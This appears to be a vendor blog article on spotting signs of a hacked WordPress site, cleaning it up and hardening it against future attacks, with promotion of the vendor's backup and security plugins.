Without proper security measures, you may find yourself with a hacked WordPress site. As WordPress’ source code is readily available, and almost 25% of all sites run WordPress, WordPress sites make an easy target.
The WordPress core development team works to ensure that there are no security vulnerabilities in WordPress, but what about the huge amount of plugins out there with security flaws? Poorly-coded themes? The possible security issues on the server (hosting) side?
Before we look into how we can prevent being hacked, here’s an overview of the signs of WordPress hacks, as well as some of the steps required to clean up a hacked WordPress site. (Note that this is not a definitive guide to clean up a hacked site. It’s just an indication of the implications of having been hacked.)
Signs of a Hacked WordPress Site
Here are a few things to look for if you suspect your WordPress site has been hacked:
- Files on your server or in your WordPress installation that should not exist (this one requires a fair amount of knowledge to know with certainty).
- Files that have recent modification dates. If all of the files in your
wp-includesdirectory have a modification date of 2016-06-12 and one of them has a modification date of 2016-11-02, then you should be highly suspect of that recently-modified file.
- Strange requests in your access logs. This could point you towards the file used to modify your site’s files.
First Steps for Cleaning Up a Hacked WordPress Site
The scenario we’re looking at is when one (or more) of a theme’s template files have been injected with malicious code. Such code can then affect (and infect) other theme files, or in fact, any other file on the server. On a shared hosting account, this could mean that your site can be infected through another site hosted on the same server. Now that’s a scary thought.
- Go through all the files in your WordPress installation to make sure that there is no script still remaining on the site that continues to inject malicious code at different intervals.
- Change all FTP, cPanel, all WordPress passwords, and your WordPress salts and keys. If the attack happened because the attacker got ahold of any of your admin login credentials and you do not change them, there is nothing to prevent them from automatically modifying files again at a later date.
- Do a comprehensive scan of all systems that connect to your server (via FTP or other methods). There are viruses floating around that can sniff login details. So, even if you change all your passwords, if just one system is compromised with such a virus, all the servers/sites connected to that system will continue to get attacked.
- If you have a WordPress backup that you made before the hack, you might try restoring from that backup, checking the files to see if the hack is in place, and go from there.
- Thoroughly clean every one of your sites. Don’t just remove one infected file modification or run a scanner plugin. Go through every directory on your site and look for suspicious files. You may want to talk to your hosting company and/or hire a consultant such as Sucuri to help with this process. If even one compromised file or covertly-placed script remains on the site, this can be used by the attacker to automatically compromise your site all over again.
Tip: You can quickly rule out files in the
wp-admin directories by downloading a fresh WordPress zip, deleting the
wp-admin directories from your site, and uploading the contents of the zip to your site while telling your FTP client to overwrite any existing files.
At this point, I would focus on your root directory, any non-WordPress directories in the root of your site, and the
wp-content directory. You can also delete and reinstall all plugins and themes to ensure that they are clean.
How to Prevent Your WordPress Site From Being Hacked
While there is no such thing as a 100% guaranteed secure site, there are however a lot of measures you can take to harden a site as much as possible.
I’ve seen plugins and themes from shady sites that had code in them that started the ball rolling on hacks. I’ve even seen plugin and theme viruses that would automatically infect every other plugin and theme on the site, so even if you cleaned one of them, it would automatically be reinfected.
Make sure that WordPress and all themes and plugins on your site are up to date. Delete deactivated plugins, don’t leave them in the
wp-content/plugins folder. They are a potential security risk, as you probably don’t care too much about updating these. iThemes Sync is a tool that allows you to manage multiple WordPress sites to update WordPress, themes and plugins on multiple sites with one click.
Backup your WordPress site early, and backup often. Having a healthy full backup of your site is key. Keep an archive of several backup files. If disaster strikes, you will need a backup to restore you site (after the server is cleaned). Quick tip on backup files: run some test restores of your backup files every now and then. Having a backup that you can’t restore is probably the worst thing that can happen (after being hacked). BackupBuddy is a WordPress backup plugin that enables you to set scheduled backups that will run unattended, and where backup files can be saved to a remote location. This should offer you peace of mind that you will always have a healthy backup file.
You can take action to make your WordPress site more secure. iThemes Security, a WordPress security plugin allows you to secure your WordPress site. There are several ways you can prevent access to your WordPress dashboard, monitor for file changes, scans for malware and so on.
Make sure you’re practicing WordPress password security by using long, complicated passwords. Activate WordPress two-factor authentication for an added layer of security.
Make it a habit to regularly evaluate your site’s safety situation. Just as you check your vehicle’s oil level periodically. The iThemes Security plugin allows you to run a WordPress security check to make sure you’re running recommended security settings. Make sure to harden WordPress with these 10 WordPress security tips.
Finally, make sure that you are hosting your site with a provider that understands the issues and risks with hosting WordPress sites. A hosting provider that will do their best, from their (server) side, to provide a safe and well secured hosting environment.